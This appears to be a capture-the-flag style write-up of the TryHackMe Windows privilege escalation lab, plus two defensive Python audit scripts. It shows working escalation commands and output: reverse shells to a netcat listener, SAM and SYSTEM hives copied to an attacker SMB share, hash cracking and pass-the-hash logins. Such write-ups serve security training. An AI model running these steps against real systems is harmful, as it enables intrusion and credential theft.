Complete Windows Privilege Escalation…
Based on THM Winprivesc
For the past few months, I have been away from the field of information security, but I am now back and ready to continue my learning journey. I have decided to create a write-up for future studies to help me regain my knowledge in this area and keep myself updated.
I’ve set some goals to keep myself in this field, one of which is to publish two writeups on Medium, the first of which is about WinPrivesc.
Let's GET into IT……
Service Exploits
* Insecure Service Permissions
* Unquoted Service Path
* Weak Registry Permissions
* Insecure Service Executables
**Insecure Service Permissions**
Insecure service permissions are a weakness where a service's access control list (DACL) is misconfigured so that a low-privileged user can change the service's configuration, such as the executable it runs, and with it what runs under the service account (LocalSystem here).
```
winPEASany.exe
daclsvc(DACL Service)[C:\Program Files\DACL Service\daclservice.exe] - Manual - Stopped
    YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
```
As shown above, winPEAS reports that the daclsvc service is misconfigured in a way that lets us elevate our privileges.
To do that, first create reverse.exe and change the binpath of daclsvc so it points at reverse.exe. Before that, confirm that the current user actually has the rights needed to change the service configuration.
Use accesschk.exe to check the listed permissions.
```
C:\PrivEsc>accesschk.exe /accepteula -vsqwc user daclsvc
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
```
AccessChk is an application that checks the access a user or group has to files, registry keys, objects, processes or services.
- -v = verbose
- -s = recurse
- -q = quiet (omit the banner)
- -w = show only objects that grant write access
- -c = the name given is a Windows service
- SERVICE_QUERY_CONFIG: This permission allows the user to query the configuration of the service, such as its start type, error control, binary path name, and other service parameters.
- SERVICE_CHANGE_CONFIG: This permission allows the user to change the configuration of the service, such as changing its start type, binary path name, or dependencies.
```
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>sc config daclsvc binpath="C:\PrivEsc\reverse.exe"
[SC] ChangeServiceConfig SUCCESS

C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\PrivEsc\reverse.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\PrivEsc>net start daclsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.
```
The error is expected: reverse.exe is not a real service binary, so the Service Control Manager reports that it is not responding, but it has already been started as LocalSystem. Check that the netcat listener caught the shell:
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.179.130] 49927
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```
**Unquoted Service Path**
Unquoted Service Path is a security weakness in Windows where the path to a service executable contains spaces but is not enclosed in quotes. Windows then has to guess where the executable name ends, and it tries each space-delimited prefix (with .exe appended) before the full path; an attacker who can write to one of those intermediate directories can make the service launch their own binary instead, undermining the security of the system.
```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
```
Check the permissions to see whether the built-in Users group has RW access to the directory.
```
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
```
The “RW” next to “BUILTIN\Users” means that the built-in Users group has both read and write access to the folder.
Now copy reverse.exe into the unquoted path as Common.exe (the candidate Windows tries inside the writable folder), then start the service.
```
C:\PrivEsc>copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
        1 file(s) copied.

C:\PrivEsc>net start unquotedsvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.
```
Check the netcat listener:
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.179.130] 49845
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```
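As an added example (not part of the original write-up), the following Python script audits a service for the unquoted-path problem described above: it parses an `sc qc` listing, decides whether BINARY_PATH_NAME is an unquoted path containing spaces, lists the intermediate executables Windows would try and the directories whose ACLs therefore decide the risk, and produces the quoted value that fixes it. The sample `sc qc` output is constructed to match the format shown above, and the function names are my own.

```python
import re

# Constructed sample in the format of the "sc qc" output shown in this write-up
# (not captured from the room's machine).
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Turn 'sc qc <service>' output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def executable_part(binary_path):
    """The executable portion of BINARY_PATH_NAME: a quoted string, or text up to '.exe'."""
    m = re.match(r'^\s*(".*?"|.*?\.exe)', binary_path, re.IGNORECASE)
    return m.group(1) if m else binary_path.strip()


def is_unquoted_with_spaces(binary_path):
    """True when the executable path is not quoted and contains a space: the vulnerable case."""
    exe = executable_part(binary_path)
    return not exe.startswith('"') and " " in exe


def search_candidates(binary_path):
    """Executables Windows may try, in order, for an unquoted path with spaces:
    every space-delimited prefix with .exe appended, then the real path."""
    exe = executable_part(binary_path)
    if not is_unquoted_with_spaces(binary_path):
        return [exe.strip('"')]
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def directories_to_check(binary_path):
    """Directories whose ACL must not grant write access to low-privileged users:
    the parent of every candidate that Windows tries before the real executable."""
    candidates = search_candidates(binary_path)
    return sorted({c.rsplit("\\", 1)[0] for c in candidates[:-1]})


def quoted_binpath(binary_path):
    """Remediation: the value for 'sc config <service> binpath=' with the path quoted."""
    stripped = binary_path.strip()
    exe = executable_part(stripped)
    if not exe or exe.startswith('"'):
        return stripped
    return '"' + exe + '"' + stripped[len(exe):]


def audit_service(sc_qc_text):
    """Audit one service from its 'sc qc' output."""
    fields = parse_sc_qc(sc_qc_text)
    path = fields.get("BINARY_PATH_NAME", "")
    vulnerable = is_unquoted_with_spaces(path)
    return {
        "service": fields.get("SERVICE_NAME"),
        "binary_path": path,
        "unquoted_with_spaces": vulnerable,
        "candidates": search_candidates(path) if vulnerable else [],
        "directories_to_check": directories_to_check(path) if vulnerable else [],
        "fixed_binpath": quoted_binpath(path),
    }
```

Run `audit_service` over the `sc qc` output of every service to find those where one of the listed directories is writable by BUILTIN\Users; the `fixed_binpath` value is what `sc config <service> binpath=` needs.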
**Weak Registry Permissions**
A weak registry permissions issue with regsvc occurs when the registry key that defines the service (under HKLM\System\CurrentControlSet\Services) has weak permissions, allowing unauthorized users or applications to modify or delete its values.
Check the permissions on the service's registry key.
```
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS
```
The “NT AUTHORITY\INTERACTIVE” group has full control (KEY_ALL_ACCESS) of the registry key, so it can both read and write it. This means that any user who is logged on interactively has full control of the key.
```
C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Insecure Registry Service\insecureregistryservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Insecure Registry Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```
The binpath cannot be changed with sc config here, because the current user lacks the necessary permissions on the service object itself. Query the registry key to see the values the service is built from:
```
C:\PrivEsc>reg query hklm\System\CurrentControlSet\Services\regsvc

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\regsvc
    Type            REG_DWORD       0x10
    Start           REG_DWORD       0x3
    ErrorControl    REG_DWORD       0x1
    ImagePath       REG_EXPAND_SZ   C:\Program Files\Insecure Registry Service\insecureregistryservice.exe
    DisplayName     REG_SZ          Insecure Registry Service
    ObjectName      REG_SZ          LocalSystem

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\regsvc\Security
```
Overwrite the ImagePath value so it points to reverse.exe, then start the service.
```
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
The operation completed successfully.

C:\PrivEsc>net start regsvc
```
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.222.155] 49835
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```
**Insecure Service Executables**
```
filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
    File Permissions: Everyone [AllAccess]
```
Check the listed permissions:
```
C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS
```
Everyone and BUILTIN\Users have full access to the service executable, so copy reverse.exe over filepermservice.exe and start the service.
```
C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
        1 file(s) copied.

C:\PrivEsc>net start filepermsvc
```
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.222.155] 49766
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```
Registry
* Autorun
* AlwaysInstallElevated
**Autorun**
The Autorun registry keys specify the actions that Windows should take when a removable media is inserted, such as launching a specific program or opening a file. The entry winPEAS found here lives under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, whose programs are started automatically whenever a user logs on.
```
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]
RegPath: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
Check the permissions.
```
C:\PrivEsc>accesschk.exe /accepteula -qwvu "C:\Program Files\Autorun Program\program.exe"
C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS
```
Users have full access, so copy reverse.exe over program.exe.
```
C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
        1 file(s) copied.
```
Then restart and log in as the last logged-on user, “admin”; the Run entry launches the replaced program.exe in that user's session.
**AlwaysInstallElevated**
The AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges.
When the value is set to 1, the Windows Installer service runs all installations with elevated privileges, regardless of the user’s permissions. The policy only takes effect when the value is 1 under both HKLM and HKCU; the HKCU key is queried below, and the HKLM key should be checked the same way.
```
C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```
Then execute reverse.msi with msiexec:
```
C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
```
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 43
listening on [any] 43 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.88.30] 49831
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```
Passwords
* Registry
* Saved Password
* SAM
**Registry**
The Windows registry is a database that stores configuration information for the operating system and installed programs. Sometimes passwords are stored in the registry as well.
Search for “password” in the registry, then check a few well-known locations:
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
:: PuTTY
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
:: VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
:: Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
:: SNMP
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
```
```
C:\Users\user>reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42
    ProxyUsername    REG_SZ    admin
    ProxyPassword    REG_SZ    password123
```
The /s option makes reg query search all subkeys of the target key.
**Saved Passwords**
There are two ways to list the saved credentials: winPEAS and cmdkey.
cmdkey is used to manage stored user credentials for network connections and remote servers, and it also lists the stored credentials.
```
C:\Users\user>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin
```
winPEAS:
```
C:\PrivEsc>.\winPEASany.exe quiet cmd windowscreds

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02nfpgrklkitqatu
    Local machine persistence

    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin
```
```
C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe
Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ...
```
The above command uses runas with the /savecred option to start C:\PrivEsc\reverse.exe with the stored credentials of the user “admin”.
**SAM (Security Account Manager)**
In Windows, password hashes are stored in the Security Account Manager (SAM) database file, which is encrypted with a key stored in the SYSTEM file.
Copy the backup copies of both files from C:\Windows\Repair to our SMB share:
```
C:\Windows\Repair>copy "C:\Windows\Repair\SAM" \\10.9.3.94\arun\
        1 file(s) copied.

C:\Windows\Repair>copy "C:\Windows\Repair\SYSTEM" \\10.9.3.94\arun\
        1 file(s) copied.
```
Extract the hashes with creddump7's pwdump.py:
```
┌──(arun㉿kali)-[/usr/share/creddump7]
└─$ python pwdump.py ~/CTF/THM/win10priv/SYSTEM ~/CTF/THM/win10priv/SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
```
Crack the admin hash using hashcat (mode 1000 is NTLM):
```
hashcat -a 0 -m 1000 admin_hash /usr/share/wordlists/rockyou.txt
```
Hash cracked: password123
**Pass the hash**
Log in using the hash without cracking it.
psexec:
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ impacket-psexec admin@10.10.252.3 -hashes :a9fdfa03xxxxxxxxxxxxxc855dd74f0da
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.252.3.....
[*] Found writable share ADMIN$
[*] Uploading file NzXXijvd.exe
[*] Opening SVCManager on 10.10.252.3.....
[*] Creating service RcIU on 10.10.252.3.....
[*] Starting service RcIU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
pth-winexe:
```
┌──(arun㉿kali)-[~]
└─$ pth-winexe -U "admin%aad3b435b5140xxxxxxxxxxxxxxxxxxxxxxxxbc76dc855dd74f0da" //10.10.252.3 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>woami
woami
'woami' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
win-qba94kb3iof\admin
```
Evil-WinRM:
```
┌──(arun㉿kali)-[~]
└─$ evil-winrm -i 10.10.252.3 -u admin -H a9fdfa038xxxxxxxxxxx55dd74f0da

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\admin\Documents> whoami
win-qba94kb3iof\admin
```
Scheduled Tasks
Task Scheduler is a built-in utility in Windows that allows you to schedule automated tasks to run at specific times or events.
The schtasks command displays a list of all scheduled tasks on a Windows computer, along with their properties and settings.
```
schtasks /query /fo LIST /v
```
Get-ScheduledTask is a PowerShell cmdlet that also retrieves information about the scheduled tasks on a Windows computer.
```
Get-ScheduledTask | ft TaskName,TaskPath,State
```
There is a script named CleanUp.ps1 that runs on the system every minute as a scheduled task.
Check the listed permissions using accesschk.exe.
```
C:\PrivEsc>.\accesschk.exe /accepteula -quvw "C:\DevTools\CleanUp.ps1"
C:\DevTools\CleanUp.ps1
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ADD_FILE
        FILE_ADD_SUBDIRECTORY
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        DELETE
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
```
The BUILTIN\Users group has write permissions (FILE_WRITE_DATA and FILE_APPEND_DATA) on the script, so append a line that launches our reverse shell to CleanUp.ps1.
```
C:\PrivEsc>echo rev.exe >> "C:\DevTools\CleanUp.ps1"
```
Wait for the scheduled task to run to obtain the shell.
Insecure GUI applications
Insecure GUI applications is a weakness that allows an attacker to escalate privileges on a Windows system by abusing graphical user interface (GUI) applications that are running with higher privileges.
```
C:\Users\user>tasklist /V | findstr mspaint.exe
cmd.exe                       4552 RDP-Tcp#1                  2      4,132 K Running         WIN-QBA94KB3IOF\user                                    0:00:00 C:\Windows\system32\cmd.exe - findstr  mspaint.exe
mspaint.exe                   3904 RDP-Tcp#1                  2     27,872 K Running         WIN-QBA94KB3IOF\admin                                   0:00:00 Untitled - Paint

C:\Users\user>
```
Because MSPaint is running as admin, its own file dialogs can be used to launch other programs with the same privileges. Open MSPaint and go to the ‘File’ menu, then select ‘Open’. In the navigation bar of the dialog, type ‘C:\Windows\System32\cmd.exe’ to launch a Command Prompt window with administrative rights; that prompt can then be used to carry out actions with elevated privileges.
Startup apps
Windows Privilege Escalation through Startup Apps refers to the process of exploiting weaknesses in applications that are set to automatically start when the operating system boots.
The path “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup” is the all-users Windows Startup folder. It contains shortcuts to applications that are launched automatically when a user logs on.
Verify the folder permissions using accesschk.exe to determine whether the built-in Users group has write access.
```
C:\PrivEsc>.\accesschk.exe /accepteula -qduv "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\Administrator
        FILE_ALL_ACCESS
  RW WIN-QBA94KB3IOF\admin
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  R  Everyone
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL
```
The built-in Users group has full access rights to the folder.
Add the “reverse.exe” file to the “Startup” folder.
```
C:\PrivEsc>copy reverse.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\rev.exe"
        1 file(s) copied.
```
Restart the system; when the admin user logs on, the copied “reverse.exe” runs with that user's privileges.
```
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.175.166] 49864
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
win-qba94kb3iof\admin
```
Step 2:
Alternatively, create a VBScript that writes a shortcut to reverse.exe into the Startup folder. After restarting the system and logging back in as the admin user, the shell is triggered.
```
C:\PrivEsc>type CreateShortcut.vbs
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

C:\PrivEsc>cscript C:\PrivEsc\CreateShortcut.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
```
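As an added example (not part of the original write-up), here is a Python parser for the accesschk listings used in the Insecure Service Permissions, Unquoted Service Path, Weak Registry Permissions, Insecure Service Executables, Autorun, Scheduled Tasks and Startup apps sections above. It flags every object on which a low-privileged identity (Everyone, BUILTIN\Users, INTERACTIVE, Authenticated Users) holds write access, which is the condition each of those sections relies on, and names the specific rights that matter. The sample accesschk output is constructed in the same format as the listings above; the principal and rights sets are my own choices.

```python
import re

# Constructed sample in the format of the accesschk output shown in this write-up
# (a service registry key with -uvwqk, a directory with -uwdq, and a file with -quvw).
ACCESSCHK_SAMPLE = r"""
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
C:\DevTools\CleanUp.ps1
  Medium Mandatory Level (Default) [No-Write-Up]
  R  Everyone
        FILE_READ_DATA
        FILE_EXECUTE
        READ_CONTROL
        SYNCHRONIZE
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
"""

# Identities every local user holds; write access for them is what each section above abuses.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# Rights that let the holder change what a service runs, for files, keys and service objects.
RISKY_RIGHTS = {
    "FILE_ALL_ACCESS", "FILE_WRITE_DATA", "FILE_APPEND_DATA", "FILE_ADD_FILE",
    "KEY_ALL_ACCESS", "KEY_SET_VALUE",
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
    "DELETE", "WRITE_DAC", "WRITE_OWNER",
}

PRINCIPAL_RE = re.compile(r"^\s*(RW|R|W)\s+(\S.*?)\s*$")
RIGHT_RE = re.compile(r"^\s*([A-Z][A-Z_]+)\s*$")


def parse_accesschk(text):
    """Parse accesschk output into [{"object": ..., "entries": [{"principal", "access", "rights"}]}]."""
    objects = []
    current = None
    for line in text.splitlines():
        if not line.strip() or "Mandatory Level" in line:
            continue
        pm = PRINCIPAL_RE.match(line)
        if pm and current is not None:
            current["entries"].append({"principal": pm.group(2), "access": pm.group(1), "rights": []})
            continue
        rm = RIGHT_RE.match(line)
        if rm and current is not None and current["entries"]:
            current["entries"][-1]["rights"].append(rm.group(1))
            continue
        # Any other non-empty line names a new object (file, directory or registry key).
        current = {"object": line.strip(), "entries": []}
        objects.append(current)
    return objects


def weak_entries(text):
    """Each (object, principal) where a low-privileged identity holds write access."""
    found = []
    for obj in parse_accesschk(text):
        for entry in obj["entries"]:
            if "W" in entry["access"] and entry["principal"].lower() in LOW_PRIV_PRINCIPALS:
                found.append({
                    "object": obj["object"],
                    "principal": entry["principal"],
                    "risky_rights": sorted(set(entry["rights"]) & RISKY_RIGHTS),
                })
    return found
```

An empty `risky_rights` list means accesschk was run without -v, so the entry is writable but the individual rights were not listed; rerun with -v on that object to see which ones.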
Token Impersonation
Token impersonation is a technique in which a process that holds the impersonation privilege can use another user’s security token, allowing it to perform actions as if it were that user.
RoguePotato
Welcome to the potato family; there are a lot of potatoes for escalating privileges.
* If the machine is Windows 10 1809 / Windows Server 2019 or newer, try RoguePotato.
* If the machine is older than Windows 10 1809 / Windows Server 2019, try JuicyPotato.
https://github.com/antonioCoco/RoguePotato
This requires the current account to hold the privilege to impersonate security tokens (SeImpersonatePrivilege), which is typically granted to service accounts but not to user-level accounts. Unfortunately, our current account does not have it.
```
C:\PrivEsc>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
In our case, even the admin account doesn’t have SeImpersonatePrivilege.
First, get a reverse shell as the local service account using PsExec64.exe.
PsExec is a command-line tool that allows you to run processes on remote systems and redirect console output to the local system.
```
C:\Windows\system32>C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
```
This command runs reverse.exe as the “nt authority\local service” user (on the local machine here, since no remote host is given).
```
┌──(arun㉿kali)-[~/CTF/THM/win10priv]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49756
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\local service

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```
Now on this shell SeImpersonatePrivilege is enabled, so RoguePotato can be used. First set up the socat redirector on the Kali machine: it must listen on port 135 and forward the connection back to TCP port 9999 on the target.
```
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.198.189:9999
```
